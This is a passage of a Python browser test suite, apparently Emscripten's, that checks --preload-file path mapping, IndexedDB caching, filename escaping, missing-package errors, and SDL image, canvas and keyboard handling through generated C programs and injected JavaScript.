  self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
                  args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
  # Exercises every supported spelling of --preload-file 'src[@dst]':
  # relative/absolute sources, '@' destination mapping, '@@' escaping,
  # directory packaging with --exclude-file, tricky filesystem characters,
  # -o into a subdirectory, and FS.createPreloadedFile from a pre-js.
  absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
  open(absolute_src_path, 'w').write('''load me right before running the code please''')

  absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
  open(absolute_src_path2, 'w').write('''load me right before running the code please''')

  absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
  open(absolute_src_path3, 'w').write('''load me right before running the code please''')

  def make_main(path):
    # Regenerates main.cpp so that it fopen()s *path* and reports whether the
    # preloaded contents arrived intact.
    print('make main at', path)
    path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <emscripten.h>
      int main() {
        FILE *f = fopen("%s", "r");
        char buf[100];
        fread(buf, 1, 20, f);
        buf[20] = 0;
        fclose(f);
        printf("|%%s|\n", buf);
        int result = !strcmp("load me right before", buf);
        REPORT_RESULT(result);
        return 0;
      }
      ''' % path)

  test_cases = [
    # (source preload-file string, file on target FS to load)
    ("somefile.txt", "somefile.txt"),
    (".somefile.txt@somefile.txt", "somefile.txt"),
    ("./somefile.txt", "somefile.txt"),
    ("somefile.txt@file.txt", "file.txt"),
    ("./somefile.txt@file.txt", "file.txt"),
    ("./somefile.txt@./file.txt", "file.txt"),
    ("somefile.txt@/file.txt", "file.txt"),
    ("somefile.txt@/", "somefile.txt"),
    (absolute_src_path + "@file.txt", "file.txt"),
    (absolute_src_path + "@/file.txt", "file.txt"),
    (absolute_src_path + "@/", "somefile.txt"),
    ("somefile.txt@/directory/file.txt", "/directory/file.txt"),
    ("somefile.txt@/directory/file.txt", "directory/file.txt"),
    (absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
    ("some@@file.txt@other.txt", "other.txt"),
    ("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]

  for srcpath, dstpath in test_cases:
    print('Testing', srcpath, dstpath)
    make_main(dstpath)
    self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

  if WINDOWS:
    # On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
    # The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
    tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
  else:
    # All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
    tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
  open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
  make_main(tricky_filename)
  # As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
  self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

  # By absolute path
  make_main('somefile.txt') # absolute becomes relative
  self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

  # Test subdirectory handling with asset packaging.
  try_delete('assets')
  ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
  ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
  ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
  create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
  create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
  create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
  absolute_assets_src_path = 'assets'.replace('\\', '/')

  def make_main_two_files(path1, path2, nonexistingpath):
    # Like make_main, but also checks a second file exists and a third
    # (excluded) file does NOT exist on the virtual FS.
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <emscripten.h>
      int main() {
        FILE *f = fopen("%s", "r");
        char buf[100];
        fread(buf, 1, 20, f);
        buf[20] = 0;
        fclose(f);
        printf("|%%s|\n", buf);
        int result = !strcmp("load me right before", buf);
        f = fopen("%s", "r");
        if (f == NULL)
          result = 0;
        fclose(f);
        f = fopen("%s", "r");
        if (f != NULL)
          result = 0;
        REPORT_RESULT(result);
        return 0;
      }
    ''' % (path1, path2, nonexistingpath))

  test_cases = [
    # (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
    ("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
    ("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
    ("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
    ("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
    ("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
    (absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
    (absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]

  for test in test_cases:
    (srcpath, dstpath1, dstpath2, nonexistingpath) = test
    make_main_two_files(dstpath1, dstpath2, nonexistingpath)
    print(srcpath)
    self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

  # Should still work with -o subdir/..
  make_main('somefile.txt') # absolute becomes relative
  ensure_dir('dirrey')
  self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
  self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')

  # With FS.preloadFile
  create_test_file('pre.js', '''
    Module.preRun = function() {
      FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
    };
  ''')
  make_main('someotherfile.txt')
  self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')

# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
  src = path_from_root('tests/manual_download_data.cpp')
  create_test_file('file.txt', '''Hello!''')
  self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
  # The custom HTML page drives the .data download itself.
  shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
  self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
  tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.

  d = 'dir with ' + tricky_part
  abs_d = os.path.join(self.get_dir(), d)
  ensure_dir(abs_d)
  txt = 'file with ' + tricky_part + '.txt'
  abs_txt = os.path.join(abs_d, txt)
  open(abs_txt, 'w').write('load me right before')

  cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
  # The quote characters in the target filename are escaped for the C string.
  open(cpp, 'w').write(r'''
    #include <stdio.h>
    #include <string.h>
    #include <emscripten.h>
    int main() {
      FILE *f = fopen("%s", "r");
      char buf[100];
      fread(buf, 1, 20, f);
      buf[20] = 0;
      fclose(f);
      printf("|%%s|\n", buf);
      int result = !strcmp("|load me right before|", buf);
      REPORT_RESULT(result);
      return 0;
    }
  ''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))

  data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
  data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
  self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
  page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
  abs_page_file = os.path.join(self.get_dir(), page_file)
  self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
  self.run_browser(page_file, '|load me right before|.', '/report_result?0')

def test_preload_caching(self):
  # First run fetches the package, second must hit the IndexedDB cache
  # (checkPreloadResults counts cached packages → result goes 1 then 2).
  create_test_file('main.cpp', r'''
    #include <stdio.h>
    #include <string.h>
    #include <emscripten.h>
    extern "C" {
      extern int checkPreloadResults();
    }
    int main(int argc, char** argv) {
      FILE *f = fopen("%s", "r");
      char buf[100];
      fread(buf, 1, 20, f);
      buf[20] = 0;
      fclose(f);
      printf("|%%s|\n", buf);
      int result = 0;
      result += !strcmp("load me right before", buf);
      result += checkPreloadResults();
      REPORT_RESULT(result);
      return 0;
    }
  ''' % 'somefile.txt')

  create_test_file('test.js', '''
    mergeInto(LibraryManager.library, {
      checkPreloadResults: function() {
        var cached = 0;
        var packages = Object.keys(Module['preloadResults']);
        packages.forEach(function(package) {
          var fromCache = Module['preloadResults'][package]['fromCache'];
          if (fromCache)
            ++ cached;
        });
        return cached;
      }
    });
  ''')

  # test caching of various sizes, including sizes higher than 128MB which is
  # chrome's limit on IndexedDB item sizes, see
  # https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
  # https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
  for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
    if is_chrome() and extra_size >= 100 * 1024 * 1024:
      continue
    create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
    print('size:', os.path.getsize('somefile.txt'))
    self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')

def test_preload_caching_indexeddb_name(self):
  # Same cached-on-second-run check, but with the package produced by the
  # file packager directly using a custom --indexedDB-name.
  create_test_file('somefile.txt', '''load me right before running the code please''')

  def make_main(path):
    print(path)
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <emscripten.h>
      extern "C" {
        extern int checkPreloadResults();
      }
      int main(int argc, char** argv) {
        FILE *f = fopen("%s", "r");
        char buf[100];
        fread(buf, 1, 20, f);
        buf[20] = 0;
        fclose(f);
        printf("|%%s|\n", buf);
        int result = 0;
        result += !strcmp("load me right before", buf);
        result += checkPreloadResults();
        REPORT_RESULT(result);
        return 0;
      }
    ''' % path)

  create_test_file('test.js', '''
    mergeInto(LibraryManager.library, {
      checkPreloadResults: function() {
        var cached = 0;
        var packages = Object.keys(Module['preloadResults']);
        packages.forEach(function(package) {
          var fromCache = Module['preloadResults'][package]['fromCache'];
          if (fromCache)
            ++ cached;
        });
        return cached;
      }
    });
  ''')

  make_main('somefile.txt')
  self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
  self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
  self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
  # Preloading files from a directory tree: first file-by-file, then by
  # passing the whole directory (sources deleted afterwards to prove the
  # packaged copy is what the page reads).
  ensure_dir(os.path.join('subdirr', 'moar'))
  create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
  create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
  create_test_file('main.cpp', r'''
    #include <stdio.h>
    #include <string.h>
    #include <emscripten.h>
    int main() {
      char buf[17];
      FILE *f = fopen("subdirr/data1.txt", "r");
      fread(buf, 1, 16, f);
      buf[16] = 0;
      fclose(f);
      printf("|%s|\n", buf);
      int result = !strcmp("1214141516171819", buf);
      FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
      fread(buf, 1, 16, f2);
      buf[16] = 0;
      fclose(f2);
      printf("|%s|\n", buf);
      result = result && !strcmp("3.14159265358979", buf);
      REPORT_RESULT(result);
      return 0;
    }
  ''')

  # by individual files
  self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
  self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
  os.remove('page.html')

  # by directory, and remove files to make sure
  self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
  shutil.rmtree('subdirr')
  self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')

def test_custom_file_package_url(self):
  # Module.locateFile redirects the .data package fetch to a "cdn" directory.
  # a few files inside a directory
  ensure_dir('subdirr')
  ensure_dir('cdn')
  create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
  # change the file package base dir to look in a "cdn". note that normally
  # you would add this in your own custom html file etc., and not by
  # modifying the existing shell in this manner
  create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
  create_test_file('main.cpp', r'''
    #include <stdio.h>
    #include <string.h>
    #include <emscripten.h>
    int main() {
      char buf[17];
      FILE *f = fopen("subdirr/data1.txt", "r");
      fread(buf, 1, 16, f);
      buf[16] = 0;
      fclose(f);
      printf("|%s|\n", buf);
      int result = !strcmp("1214141516171819", buf);
      REPORT_RESULT(result);
      return 0;
    }
  ''')

  self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
  shutil.move('test.data', os.path.join('cdn', 'test.data'))
  self.run_browser('test.html', '', '/report_result?1')

def test_missing_data_throws_error(self):
  # A missing or unreachable .data package must surface through window.onerror
  # with the package name in the message (result=1 only then).
  def setup(assetLocalization):
    self.clear()
    create_test_file('data.txt', 'data')
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <emscripten.h>
      int main() {
        // This code should never be executed in terms of missing required dependency file.
        REPORT_RESULT(0);
        return 0;
      }
    ''')
    create_test_file('on_window_error_shell.html', r'''
      <html>
      <center><canvas id='canvas' width='256' height='256'></canvas></center>
      <hr><div id='output'></div><hr>
      <script type='text/javascript'>
        window.onerror = function(error) {
          window.onerror = null;
          var result = error.indexOf("test.data") >= 0 ? 1 : 0;
          var xhr = new XMLHttpRequest();
          xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
          xhr.send();
          setTimeout(function() { window.close() }, 1000);
        }
        var Module = {
          locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
          print: (function() {
            var element = document.getElementById('output');
            return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
          })(),
          canvas: document.getElementById('canvas')
        };
      </script>
      {{{ SCRIPT }}}
      </body>
      </html>''')

  def test():
    # test test missing file should run xhr.onload with status different than 200, 304 or 206
    setup("")
    self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
    shutil.move('test.data', 'missing.data')
    self.run_browser('test.html', '', '/report_result?1')

    # test unknown protocol should go through xhr.onerror
    setup("unknown_protocol://")
    self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
    self.run_browser('test.html', '', '/report_result?1')

    # test wrong protocol and port
    setup("https://localhost:8800/")
    self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
    self.run_browser('test.html', '', '/report_result?1')

  test()

  # TODO: CORS, test using a full url for locateFile
  # create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
  # test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
    """Post-build hook for manual-reference tests: inject the generated
    reftest.js into test.html so the page compares itself against the
    reference image before closing.

    reference: optional reference image name; falls back to self.reference.
    """
    self.reftest(path_from_root('tests', self.reference if reference is None else reference))
    html = open('test.html').read()
    # Splice the reftest script in just before </body>; window.close is
    # wrapped so the comparison runs after rendering has settled.
    html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
    create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
    """SDL canvas rendering while proxied to a worker, verified by reftest."""
    create_test_file('data.txt', 'datum')
    proxy_args = ['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL']
    self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png',
               args=proxy_args, manual_reference=True,
               post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
    """A .js target with --proxy-to-worker emits two scripts (client + worker)."""
    compile_cmd = [path_from_root('tests', 'hello_world_gles_proxy.c'),
                   '-o', 'test.js', '--proxy-to-worker',
                   '-s', 'GL_TESTING', '-lGL', '-lglut']
    self.compile_btest(compile_cmd)
    shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
    self.post_manual_reftest('gears.png')
    self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
    """SDL canvas alpha blending; second run passes '-0' via Module['arguments'].

    N.B. On Linux with Intel integrated graphics cards, this test needs
    Firefox 49 or newer. See
    https://github.com/emscripten-core/emscripten/issues/4069.
    """
    create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
    for pre_js, ref in ((None, 'sdl_canvas_alpha.png'),
                        ('flag_0.js', 'sdl_canvas_alpha_flag_0.png')):
        extra = ['--pre-js', pre_js] if pre_js else []
        self.btest('sdl_canvas_alpha.c', args=extra + ['-lSDL', '-lGL'],
                   reference=ref, reference_slack=12)
def test_sdl_key(self):
    """SDL key events over every combination of: delayed vs. immediate
    dispatch, the SDL SetEventHandler define, and an asyncify sleep variant."""
    for delay in [0, 1]:
        for defines in [
            [],
            ['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
        ]:
            for async_ in [
                [],
                ['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
            ]:
                print(delay, defines, async_)
                # pre.js synthesizes keydown/keyup events; when `delay` is set
                # dispatch is wrapped in setTimeout(..., 1) so events arrive
                # asynchronously.
                create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
                self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
                # 223092870 is the value sdl_key.c reports on success —
                # presumably a product/hash of the key codes; TODO confirm.
                self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
    """SDL key events while proxied to a worker: pre.js pumps _one() every
    frame, and the page injects a scripted key sequence after load."""
    create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')

    def post():
        # Inject key helpers plus a fixed key sequence into the built page;
        # keydown(100)/keyup(100) tells the program to report its result.
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
        create_test_file('test.html', html)

    self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
    """The canvas element can receive input focus."""
    expected_result = '1'
    self.btest('canvas_focus.c', expected_result)
def test_keydown_preventdefault_proxy(self):
    """Proxied-to-worker build: a prevent-defaulted keydown must suppress the
    follow-up keypress, mirroring real browser behavior."""
    def post():
        # Inject helpers that mimic the browser contract: keypress is only
        # dispatched when keydown was not prevent-defaulted.
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
        create_test_file('test.html', html)

    self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
    """SDL text input: pre.js pumps _one() each frame and exposes a helper
    the C side can call to synthesize keypress events on document.body."""
    create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
    self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
    """SDL mouse events: pre.js exposes simulateMouseEvent, which dispatches
    mousedown+mouseup (button >= 0) or mousemove (button < 0) on the canvas,
    with coordinates offset by the canvas position."""
    create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
